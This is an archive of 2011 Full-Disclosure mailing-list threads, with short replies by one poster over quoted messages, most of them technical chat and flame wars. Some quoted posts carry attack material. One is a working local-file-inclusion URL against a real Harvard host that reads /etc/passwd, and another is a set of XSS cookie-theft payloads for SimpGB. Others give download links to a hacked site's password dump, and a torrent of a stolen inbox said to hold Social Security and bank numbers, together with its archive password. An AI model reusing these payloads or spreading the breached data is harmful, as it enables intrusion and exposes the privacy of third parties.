> > Quite frankly Andrew, I neither know nor care if Cal is an ex-blackhat.
>
> The fact that you state that you don't have a clue who he is and don't care
> shows a vulnerability in your secure-thinking, not only that it opens up to
> the fact that you're probably a really good target for spear-engineering of
> you socially, but perhaps that you would even be vulnerable to entrapment or
> blackmail.
>
> Andrew
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] "IO wait chains" in Linux??

[Cal Leeming [Simplicity Media Ltd]]

Hmm, I'd never heard of any of those before, I'll check them out.

Haven't really got an end goal, it's more of a learning curve trying to
teach myself some of the fundamentals about how the kernel works, and
sharing what I find.

That, and IO wait / deadlocking was the bane of my existence for the entire
of 2010 whilst attempting to try out technologies such as DRBD, XFS, OCFS2
in a HA environment :/

On Mon, Feb 7, 2011 at 11:19 PM, coderman  wrote:

> On Mon, Feb 7, 2011 at 12:06 PM,   wrote:
> > ...
> > So the big question is "what you're trying to accomplish" rather than "is
> there
> > a CLI tool that does XYZ" - most of the problems won't be found by
> checking for
> > XYZ at all...
>
> he may want more kernel land visibility, in which case kernel
> profiling, oprofile, kprobes are what you seek.
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Mr. Lemming

[Cal Leeming [Simplicity Media Ltd]]

Andrew, are you in some way suggesting that if another person engages in
conversation with me, that it will be frowned upon and/or cause them
problems?

If so, maybe you should go and give this same advice to the list of people
I've worked with on my linkedin profile, and watch how quickly you are told
to go and do one.

It is exactly this kind of narrow minded, stereotypical thinking that
alienates those with real talent, but a troubled history.

On Tue, Feb 8, 2011 at 12:06 AM, coderman  wrote:

> On Mon, Feb 7, 2011 at 3:54 PM, andrew.wallace
>  wrote:
> > The point is, should you be giving him "tips" on such a publicly
> accessible
> > platform?
>
>
> full-disclosure - supporting the dissemination of sufficient knowledge
> for intelligent decision making.
>
> i could care less about the irrelevant particulars of someones
> personal history in technical discussions. the ethical implications of
> how someone uses information (or tools, or any other resource) is a
> separate subject from the rationale for having a technical discussion
> on this list.
>
> and supporting technical discussions of any type, regarding any
> technologies, or any vulnerabilities, i fully encourage.
>
> using these discussions for ethical purposes i also encourage,
> however, that is something completely beyond my control.
>
>
> P.S. if you'd like to discuss the ethical reasoning of a
> full-disclosure advocate we can do so off list. however, the set of
> individuals capable of a reasonable discussion on ethics is very small
> and unlikely to intersect with the set of individuals on this mailing
> list, let alone one with the moniker "n3td3v". ;)
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] jaillords.com hacked, login/password/email list

[Cal Leeming [Simplicity Media Ltd]]

Was it *really* necessary to post the SQL dump publicly? :S

On Mon, Feb 7, 2011 at 11:58 PM, Bob Smith <
bobbyhadababyitsa...@googlemail.com> wrote:

> Weak passwords, no brute force protection,  lots of sql injections,
> was easy to take full control of site
>
> Heres the password files
> http://bit.ly/fpiJAe
> http://www.multiupload.com/RS_FFZYI7E55X
> http://www.multiupload.com/MU_FFZYI7E55X
> http://www.multiupload.com/DF_FFZYI7E55X
> http://www.multiupload.com/HF_FFZYI7E55X
> http://www.multiupload.com/ZS_FFZYI7E55X
> http://www.multiupload.com/UP_FFZYI7E55X
> http://www.megaupload.com/?d=J4ILN922
> http://depositfiles.com/de/files/t7bo8r83f
> http://hotfile.com/dl/102762685/72d8295/dump_07-02-2011-12-36-26.sql.html
> http://www.zshare.net/download/862671854c06f092/
> http://uploading.com/files/c1a234f8/dump_07-02-2011-12-36-26.sql/
> http://rapidshare.com/files/446763555/dump_07-02-2011-12-36-26.sql
>
>
> admins fix ur shit or we will be back
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Mr. Lemming

[Cal Leeming [Simplicity Media Ltd]]

Andrew, why on earth would you post this?

You could have at least tried to spell my name correctly :S

On Mon, Feb 7, 2011 at 11:46 PM, coderman  wrote:

> i am an ex-third-shift-stocker. look me up one day. i was fired for
> stealing a soda pop.
>
> what's the point n3td3v?  i keep holding hope you may one day, ONE
> DAY! post something with even a grain of usefulness.
>
> yet another year, i wait...
>
> (it's been what, three, four years of your inanity?)
>
>
> On Mon, Feb 7, 2011 at 3:38 PM, andrew.wallace
>  wrote:
> > Cal lemming is an ex-blackhat. Look him up one day, he was jailed for
> credit
> > carding.
> >
> > Andrew
> >
> > http://sites.google.com/site/n3td3v/
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] "IO wait chains" in Linux??

[Cal Leeming [Simplicity Media Ltd]]

Thank you for your detailed reply!

Here's the kinda thing I was looking for (this is just a mockup):

21000 - /usr/local/sbin/nginx - [D]
 - /tmp/.somefile
- other PIDs waiting on this file (not just children of the parent)
- 51283 - /usr/local/sbin/apache (4.6 seconds)
- 31028 - /usr/local/sbin/python2.6 (1.9 seconds)

Sadly, I don't know much about how the kernel and the IO schedulers handle
these things behind the scenes, so what I'm asking for may be impossible
(apart from your other suggestion using watchdog+dmesg).

On Mon, Feb 7, 2011 at 4:28 PM,  wrote:

> On Mon, 07 Feb 2011 06:41:53 GMT, "Cal Leeming [Simplicity Media Ltd]"
> said:
>
> > Is anyone aware of a Linux based CLI equivalent, which will show the
> > processes stuck in IO wait, in a tree format?
>
> ps ax | grep ' [D] '   gives a pretty good approximation of "currently in
> I/O wait".
> But remember that each process (or actually, each thread within a process)
> can individually be stuck in I/O wait, so it's unclear what the "tree
> format"
> would consist of, exactly.  If you have a process that has parent,
> siblings,
> and children, what else would show up in the tree if it's in an I/O wait?
>
> There's the slightly more difficult issue that if you're trying to do
> system-level analysis, you're looking at really bad race conditions.
>  Processes
> often go into and leave I/O wait status in literally milliseconds.  At
> best,
> you can run through the process list several times and get a statistical
> view
> of "these 4 processes are in I/O wait most of the time".  'pstree' mostly
> avoids that issue because if the system is small enough that the pstree
> output
> is still useful, the fork/exec rate is low enough that pstree can mostly
> ignore
> it.  That's not true for I/O.
>
> If you're trying to identify processes that are truly and literally *stuck*
> in
> I/O wait due to a hardware or kernel error, you're probably better off
> enabling
> the watchdog timer in the kernel and watching dmesg for it triggering.
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Best Buy and Privacy?

[Cal Leeming [Simplicity Media Ltd]]

Yeah, this technique is employed by many local police forces, in which they
encourage the sharing of information between
agencies, and/or communites/businesses. This isn't something that's going to
get any easier, and it's certainly not going to be stopped.

As a general rule of the thumb, you should always apply the "chain effect"
to these scenarios. This basically means, if *anything* other than cash is
exchanged when dealing with a business, then you have absolutely no control
over what happens to this information, despite laws being in place to
'protect' it. Try to think like a fraud investigator, what tricks would you
use to trace the steps of a purchase?

Slightly off subject but, the same logic applies to cell phones. Even if you
go into a store in another city, purchase a SIM with cash from an over the
counter corner shop with little CCTV, that SIM can still be tied back to you
based on 'trends' in your local area. This is why I always laugh when people
make a concerted effort to make sure as little information about them ends
up in the public domain, because it's really all much of a muchness. If
someone wants to find info on you, they will find it, one way or another
lol.

As a good friend once quoted to me: "Total paranoid is total awareness".




On Fri, Feb 4, 2011 at 7:31 PM, CSIRTTAC  wrote:

> And the turnaround at Gamestop would be a much better investment anyway.
> Usually you can get at least 10-20% off or up to 15 bucks or so on a new
> game with your trade-in's there vice turning them into BestBuy.
>
> -Original Message-
> From: full-disclosure-boun...@lists.grok.org.uk [mailto:
> full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Thor (Hammer of
> God)
> Sent: Friday, February 04, 2011 12:42 PM
> To: Paul Heinlein; Thor (Hammer of God)
> Cc: full-disclosure@lists.grok.org.uk
> Subject: Re: [Full-disclosure] Best Buy and Privacy?
>
> No, that didn't come up at the time, but I wondered the same thing.   I've
> not heard of any rash of XBOX game thievery around, so my feeling is that
> it's practiced elsewhere, though I have no evidence of that.  The thing is,
> stealing a $50 game in order to get $5 or so at Best Buy isn't exactly an
> equitable model for theft, so none of it really makes too much sense to me.
>
> t
>
> >-Original Message-
> >From: Paul Heinlein [mailto:heinl...@madboa.com]
> >Sent: Friday, February 04, 2011 8:33 AM
> >To: Thor (Hammer of God)
> >Cc: full-disclosure@lists.grok.org.uk
> >Subject: Re: [Full-disclosure] Best Buy and Privacy?
> >
> >On Fri, 4 Feb 2011, Thor (Hammer of God) wrote:
> >
> >> I found this interesting, so I thought I would share it []
> >
> >It is interesting. Did you get a sense of whether the policy is specific
> to Seattle
> >/ King County / Washington?
> >
> >--
> >Paul Heinlein <> heinl...@madboa.com <> http://www.madboa.com/
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Multiple vulnerabilities in SimpGB

[Cal Leeming [Simplicity Media Ltd]]

I think it's time for a group hug :|

On Sun, Feb 6, 2011 at 10:43 AM, Michele Orru wrote:

>  ahaah.
> Nice reply Sparky.
> MustLive, seems you've been defaced :-)
>
> antisnatchor
>
>  --
>
>laurent gaffie 
> February 5, 2011 3:36 AM
>
> Hey Sparky,
>
> One of the many many thing you didn't understand during the past 5 years is
> that you should probably try to identify and fix your stuff on *your*
> website, before spamming this ML with your crap.
> cf:
> http://www.zone-h.org/mirror/id/11367858
>
> e-tard.
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> --
>
>MustLive 
> February 4, 2011 10:49 PM
>
> Hello Laurent!
>
> You are very "intelligent" man, as I see from this and previous your letter
> (in 2010).
>
> You need to take into account the next:
>
> 1. I know better where to send.
>
> 2. If you write shitty stuff, then it doesn't mean that other do the same.
>
> 3. No need to think and state instead of other people - if it's not
> interesting for you, then it can be interesting for others.
>
> 4. The main and obvious thing it's that I write all my advisories from 2006
> for those people who are interested in them (and there are such people, as
> I
> know for sure). So if you or anybody else is not interested in them, just
> skip them (and don't need to write me nonsenses) - I'm writing my letters
> not for you, but for others who is interested in them and who thanks me for
> my work. It's strange that such "intelligent" man as you didn't understand
> it for last five years :-).
>
> 5. I don't need any not serious letters from you, so don't waste your time
> writing me anymore, because I've put your e-mail into blacklist. Spend your
> time for good things.
>
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site
> http://websecurity.com.ua
>
> - Original Message -
> From: laurent gaffie
> To: MustLive
> Cc: full-disclosure@lists.grok.org.uk ; bugt...@securityfocus.com
> Sent: Wednesday, January 26, 2011 5:09 PM
> Subject: Re: [Full-disclosure] Multiple vulnerabilities in SimpGB
>
>
> Send your shitty stuff to bugt...@securityfocus.com
>
> If it's not obvious, no one give a shit here, seriously.
>
>
>
> 2011/1/27 MustLive 
>
> Hello list!
>
> I want to warn you about Cross-Site Scripting, Brute Force, Insufficient
> Anti-automation and Abuse of Functionality vulnerabilities in SimpGB.
>
> -
> Affected products:
> -
>
> Vulnerable are SimpGB v1.49.02 and previous versions.
>
> --
> Details:
> --
>
> XSS (WASC-08):
>
> POST request at page http://site/guestbook.php in parameters poster,
> postingid and location in Preview function. If captcha is using in
> guestbook, then working code of the captcha is required for the attack. Or
> via GET request:
>
>
> http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=%3Cscript%3Ealert(document.cookie)%3C/script%3E&input_text=11&preview=preview
>
>
> http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&poster=1&input_text=11&preview=preview
>
>
> http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=1&location=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&input_text=11&preview=preview
>
> Brute Force (WASC-11):
>
> http://site/admin/index.php
>
> Insufficient Anti-automation (WASC-21):
>
> http://site/admin/pwlost.php
>
> In this functionality there is no protection from automated requests
> (captcha).
>
> Abuse of Functionality (WASC-42):
>
> http://site/admin/pwlost.php
>
> In this functionality it's possible to retrieve logins.
>
> 
> Timeline:
> 
>
> 2010.11.17 - announced at my site.
> 2010.11.19 - informed developers.
> 2011.01.25 - disclosed at my site.
>
> I mentioned about these vulnerabilities at my site
> (http://websecurity.com.ua/4690/).
>
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site
> http://websecurity.com.ua
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>  --
>
>laurent gaffie 
> January 26, 2011 4:09 PM
>
> Send your shitty stuff to bugt...@securityfocus.com
>
> If it's not obvious, no one give a shit here, seriously.
>
>
>
> ___
> Full

Re: [Full-disclosure] encrypt the bash history

[Cal Leeming [Simplicity Media Ltd]]

This may/may not be relevant to your interests.

Me and a friend once stumbled across a lovely sys admin many years ago, that
patched bash to force it to log remotely (no I don't have the source).

Long story short, it got the desired effect that the sys admin was wanting
lol.

On Sun, Feb 6, 2011 at 9:17 PM, Zach C.  wrote:

> Pretty much what the others said with the addition that if you can't trust
> root, you simply cannot trust *any* command on that machine, including gpg,
> since root can compromise them in many ways, too. Best bet is to download it
> every session and clear it -- but be warned that even any method used to
> clear it can have a trap that secretly backs it up, however unlikely.
>
> Bottom line -- either trust root or don't use the machine. Those are your
> options if you feel paranoid enough that you don't want root always watching
> you.
>
> It's worth pointing out, by the way, that there are ways of watching your
> program executions without using your bash history, like auditd for example.
> In fact, I was able to write a script to parse auditd logs out to do just
> that in a really easy-to-read way -- "user (running as user2) ran
> /usr/bin/ssh with args: ssh user@host ..."
> On Feb 6, 2011 6:18 AM, "Emanuel dos Reis Rodrigues" <
> emanueldosr...@gmail.com> wrote:
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] "IO wait chains" in Linux??

[Cal Leeming [Simplicity Media Ltd]]

So, the Windows based 'Resource Monitor' seems to have a neat little feature
called 'Wait chain', which lets you see which processes are currently stuck
waiting for IO.

Is anyone aware of a Linux based CLI equivalent, which will show the
processes stuck in IO wait, in a tree format? And before anyone decides to
give a smart ass answer (I'm looking at you Benji), no the 'iowait' tool
isn't what I'm talking about lol.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] An enemy of the infosec community needs to be brought to justice

[Cal Leeming [Simplicity Media Ltd]]

Lmao @ the password.

On Thu, Feb 3, 2011 at 11:58 PM, Justin Elze  wrote:

> The password is
>
> DoomedCharlatan
>
>
> Sent from my iPhone
>
> On Feb 3, 2011, at 6:48 PM, Hack Talk  wrote:
>
> Yea I'm waiting on this too. Post it up if you got it
>
>
> Luis Santana - Security+
> Administrator - http://hacktalk.net
> HackTalk Security - Security From The Underground
>
>
>
> On Thu, Feb 3, 2011 at 5:38 PM, Wesley Kerfoot < 
> wja...@gmail.com> wrote:
>
>> where is the password for the archive?
>>
>> On Wed, Feb 2, 2011 at 1:19 PM, < 
>> gregorydev...@aim.com> wrote:
>>
>>> "Do not meddle in the affairs of hackers, for they are subtle and quick
>>> to anger"
>>>
>>> When one thinks of frauds in the infosec community, most people are
>>> quick to point to Gregory D Evans of LIGATT Security. He's been on TV,
>>> he's been on radio, he's trying to draw as much attention to himself as
>>> possible. This man in no way represents this industry
>>>
>>> Many people have done good work in trying to bring him down, and many
>>> of those people have put themselves directly in his line of fire. He's
>>> gone after people at their home to intimidate them and their family.
>>> He's gone after them at their work to discredit them with their
>>> employer. And as everyone knows, he recklessly sues anyone who speaks
>>> negatively of him on the internet.
>>>
>>> Enough is enough. He must be stopped by any means necessary. To that
>>> end, at the end of this message is a torrent of the inbox of
>>>  gregoryev...@ligatt.com; the only condition of
>>> receipt is that you not
>>> talk about the spool or this email release on twitter until after you
>>> have the full copy and are seeding it. He may be an idiot but his staff
>>> watch twitter for any mention of him, and it's imperative that this
>>> file be distributed as much as possible before takedown begins.
>>>
>>> This release immediately follows with a small regret. Apologies much be
>>> given to all the bystanders, innocent or otherwise. Contained within
>>> his inbox is personal information of many, many people. Social security
>>> numbers, bank account routing numbers, credit reports, and other
>>> reports by private investigators. It was completely impractical to
>>> redact all of this information in any effective manner, and for that:
>>> sadness. If in your search through this release you find personal
>>> information, please contact the person and notify them. Even when GDE
>>> finds out of this breach, it's quite unlikely that he will follow
>>> proper breach notification procedures.
>>>
>>> To the victims of Gregory Evans: please speak out. Defend yourself with
>>> the law. Your cause is righteous but he can only be brought to justice
>>> with your help. Don't stop fighting for integrity and truthfulness.
>>>
>>> To the employees and former employees of Gregory Evans: please speak
>>> out. We have read about the illegal treatment of you all; do not stand
>>> idly by. Talk to a lawyer about what he has subjected you to. Many of
>>> you have seen his illegal acts and some even asked to perform some on
>>> his behalf. This man is a con artist and will only continue to
>>> victimize people.
>>>
>>> To the partners and directors of Gregory Evans' many companies: shame
>>> on you. You took the easy way, following a crooked man in pursuit of
>>> money. Get out now while you still can. All that he has promised you
>>> will very soon disappear. If you decide to hang on, you will be brought
>>> down with him.
>>>
>>> To the brave soul who helped make this possible: thank you. You took
>>> great personal risk to bring this information forward, and none of it
>>> would be possible without you. It's unclear how you tolerate his lies
>>> day after day, but you've redeemed yourself by supporting this cause.
>>>
>>> Finally, to Gregory D Evans: it is done. All your lies are out in the
>>> open. Your investors will know. Your lawyers will know. Your employees
>>> will know. Your mother will know. Your lovers will know. Just step away
>>> and move on. Stop the stock scams. Stop the lawsuits. Stop the
>>> harassment. Stop robbing your employees. Stop embezzling. Stop
>>> deceiving every person in your life. When your child grows up and
>>> learns about you, the only legacy you'll be leaving is one of deception
>>> and fraud.
>>>
>>> Happy Birthday Mr. Evans
>>>  
>>> http://pastebin.com/raw.php?i=qA4fBYcG
>>> archive password will be released shortly
>>>
>>> ___
>>> Full-Disclosure - We believe in it.
>>> Charter: 
>>> http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - 
>>> http://secunia.com/
>>>
>>
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: 
>> http:

Re: [Full-disclosure] An enemy of the infosec community needs to be brought to justice

[Cal Leeming [Simplicity Media Ltd]]

ase...



Fact 19 Evans has one of the largest computer security news portal websites
in the world.  NationalCyberSecurity.com

*Christian Sciberras*: #19 - It all comes down to what the adjective,
"largest", is applied to. For instance, if it applied to "ugliness and hot
air", I'd wholeheartedly agree.



*Christian Sciberras*: #20 - Uh, no 20?!



On Thu, Feb 3, 2011 at 12:17 AM, bk  wrote:

>
> On Feb 2, 2011, at 3:01 PM, Cal Leeming [Simplicity Media Ltd] wrote:
>
> > How about you give some real examples of why he is considered to be a
> "fraud in the infosec community".
>
> Many interesting frauds here: http://attrition.org/errata/charlatan/
>
>
> --
> chort
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] An enemy of the infosec community needs to be brought to justice

[Cal Leeming [Simplicity Media Ltd]]

How about you give some real examples of why he is considered to be a "fraud
in the infosec community".

I know nothing of LIGATT security, nor this Gregory character, but one must
notice that the person who posted this thread, didn't even have the balls to
post using their real details. Or to quote a famous movie "I bet you'd f*ck
a guy in the ass and not even have the common decency to give him a reach
around".

Tbh, even if he is considered a fraud, that doesn't make him any different
than the majority of the asshats in the so called "infosec community", the
only difference is he has been on TV/Radio and thus has had more public
attention.


On Wed, Feb 2, 2011 at 6:19 PM,  wrote:

> "Do not meddle in the affairs of hackers, for they are subtle and quick
> to anger"
>
> When one thinks of frauds in the infosec community, most people are
> quick to point to Gregory D Evans of LIGATT Security. He's been on TV,
> he's been on radio, he's trying to draw as much attention to himself as
> possible. This man in no way represents this industry
>
> Many people have done good work in trying to bring him down, and many
> of those people have put themselves directly in his line of fire. He's
> gone after people at their home to intimidate them and their family.
> He's gone after them at their work to discredit them with their
> employer. And as everyone knows, he recklessly sues anyone who speaks
> negatively of him on the internet.
>
> Enough is enough. He must be stopped by any means necessary. To that
> end, at the end of this message is a torrent of the inbox of
> gregoryev...@ligatt.com; the only condition of receipt is that you not
> talk about the spool or this email release on twitter until after you
> have the full copy and are seeding it. He may be an idiot but his staff
> watch twitter for any mention of him, and it's imperative that this
> file be distributed as much as possible before takedown begins.
>
> This release immediately follows with a small regret. Apologies much be
> given to all the bystanders, innocent or otherwise. Contained within
> his inbox is personal information of many, many people. Social security
> numbers, bank account routing numbers, credit reports, and other
> reports by private investigators. It was completely impractical to
> redact all of this information in any effective manner, and for that:
> sadness. If in your search through this release you find personal
> information, please contact the person and notify them. Even when GDE
> finds out of this breach, it's quite unlikely that he will follow
> proper breach notification procedures.
>
> To the victims of Gregory Evans: please speak out. Defend yourself with
> the law. Your cause is righteous but he can only be brought to justice
> with your help. Don't stop fighting for integrity and truthfulness.
>
> To the employees and former employees of Gregory Evans: please speak
> out. We have read about the illegal treatment of you all; do not stand
> idly by. Talk to a lawyer about what he has subjected you to. Many of
> you have seen his illegal acts and some even asked to perform some on
> his behalf. This man is a con artist and will only continue to
> victimize people.
>
> To the partners and directors of Gregory Evans' many companies: shame
> on you. You took the easy way, following a crooked man in pursuit of
> money. Get out now while you still can. All that he has promised you
> will very soon disappear. If you decide to hang on, you will be brought
> down with him.
>
> To the brave soul who helped make this possible: thank you. You took
> great personal risk to bring this information forward, and none of it
> would be possible without you. It's unclear how you tolerate his lies
> day after day, but you've redeemed yourself by supporting this cause.
>
> Finally, to Gregory D Evans: it is done. All your lies are out in the
> open. Your investors will know. Your lawyers will know. Your employees
> will know. Your mother will know. Your lovers will know. Just step away
> and move on. Stop the stock scams. Stop the lawsuits. Stop the
> harassment. Stop robbing your employees. Stop embezzling. Stop
> deceiving every person in your life. When your child grows up and
> learns about you, the only legacy you'll be leaving is one of deception
> and fraud.
>
> Happy Birthday Mr. Evans
> http://pastebin.com/raw.php?i=qA4fBYcG
> archive password will be released shortly
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Harvard.edu LFI

[Cal Leeming [Simplicity Media Ltd]]

Yup fixed. Can confirm that it was showing as vuln earlier tho.

On Mon, Jan 31, 2011 at 5:51 PM, Andrew Kirch  wrote:

> On 1/31/2011 12:39 PM, peter wrote:
>
> /../../../../../../../../../../../etc/passwd
>
> > Looks like it was fixed.
> fixed here too, check your browser cache
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vulnerability discloses PIN used in Microsoft Excel secure printing

[Cal Leeming [Simplicity Media Ltd]]

Wtf, I've never heard heard of a 'secure' print :S

On Mon, Jan 31, 2011 at 8:01 AM, Ed Murphy  wrote:

> Hello list,
>
> Stumbled across this today.  It appears Excel spreadsheets store
> printer information including the PIN you might use when trying to do
> a "secure" print.
>
>
> http://insecureprinting.com/Microsoft_Excel_Spreadsheets_Expose_User_PIN_Used_for_Confidential_Secure_Printing.pdf
>
> The paper is quite thorough and shows that in most cases the PIN is
> stored in clear text in the spreadsheet, though some printer vendors
> try to obfuscate the PIN (though not very successfully).
>
> Thanks,
> Ed
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Harvard.edu LFI

[Cal Leeming [Simplicity Media Ltd]]

*claps*

On Mon, Jan 31, 2011 at 12:22 AM, Hack Talk  wrote:

> Hey,
>
> I've tried reporting issues to Harvard University tons of times in the past
> but they rarely respond and even more rarely commend researchers for finding
> vulnerabilities so I decided that full-disclosure was the way to get Harvard
> off of their crimson asses and patch this vulnerability.
>
> PoC link:
> http://www.hcs.harvard.edu/~chtnasp/index.php?page=../../../../../../../../../../../../../../../../../../../../../etc/passwd
>
> Enjoy,
>
> Luis Santana - Security+
> Administrator - http://hacktalk.net
> HackTalk Security - Security From The Underground
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] http://security.goatse.fr/gaping-hole-exposed

[Cal Leeming [Simplicity Media Ltd]]

Lmao at the shout out to Harry Pearce ;p

On 27/01/2011 02:56, Ryan Sears wrote:
> ...and for those of you who didn't get the opportunity to read it before they 
> took it down, here's a mirror:
> http://i.imgur.com/0Yxgg.jpg
>
> Apparently goatse security weren't the only ones out for 'max lols' :-P
>
>
>
> - Original Message -
> From: "Andrew Kirch"
> To: "Full Disclosure"
> Sent: Wednesday, January 26, 2011 7:41:58 PM GMT -05:00 US/Canada Eastern
> Subject: [Full-disclosure] http://security.goatse.fr/gaping-hole-exposed
>
> RLY?
> YARLY.
>
> (wasn't me of course)
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [VIDEO] Keylogger, RecordMic and Shell

[Cal Leeming [Simplicity Media Ltd]]

Hi Juan,

Can you please confirm if your release of "Insect Pro 2.0" contains
any propriety code that you or the development team have written (other than
the standard UI stuff). If so, can you elaborate on this further, and also
explain what makes this product unique?

Cheers

Cal

On Wed, Jan 26, 2011 at 4:59 AM, Juan Sacco  wrote:

> Steve, yes you can! :-)
>
> Let me know by email when you are ready! and I hope you could make a
> personal review of Insect Pro 2.0 when you get a copy :P
>
> BTW I will change that word "licence" is consufing i guess,
>
> Thanks for support our software
>
>
> Juan Sacco
>
> --
> _
> Insecurity Research - Security auditing and testing software
> Web: http://www.insecurityresearch.com
> Insect Pro 2.0 was released stay tunned
>
>
> On Wed, Jan 26, 2011 at 1:27 AM, Steve Pinkham wrote:
>
>> On 01/25/2011 10:06 PM, runlvl wrote:
>> > From our download section:
>> http://www.insecurityresearch.com/?page_id=926
>> >
>> > make a donation of minimum: $20 ( US Dollars )
>> >
>> > This helps us to maintain Insect Pro and the whole site!
>> >
>> > Steve,
>> >
>> > Im sorry, we cant afford the proyect ( ftp bandwich and http server ),
>> > luckily a lot of people are trusting on us, so we can continue with this
>> > tool. Thumbs up! :-)
>> >
>> > Juan Sacco
>>
>> I repeat: If I'm just paying for download access, can I pay $20,
>> download it, then host if for others to download for free.  If not, it's
>> paying for licensing, not download bandwidth.  Also, I repeat, YOUR OWN
>> SITE says you are paying for a license, not download access.
>>
>> Quote from the page we both linked to:
>> > After you make the donation please write us an email to
>> > don...@insecurityresearch.com with your full name and we will send
>> > you the user and password for your new license.
>>
>> Put up or shut up time: I will pay to host the download on my own server
>> for the next 6 months if the product license allows it(and it legal for
>> me to do so as not infringing copyright, etc), or you need to stop
>> claiming it is free.
>>
>> So, can I redistribute it for free, or are you a liar?
>>
>>
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

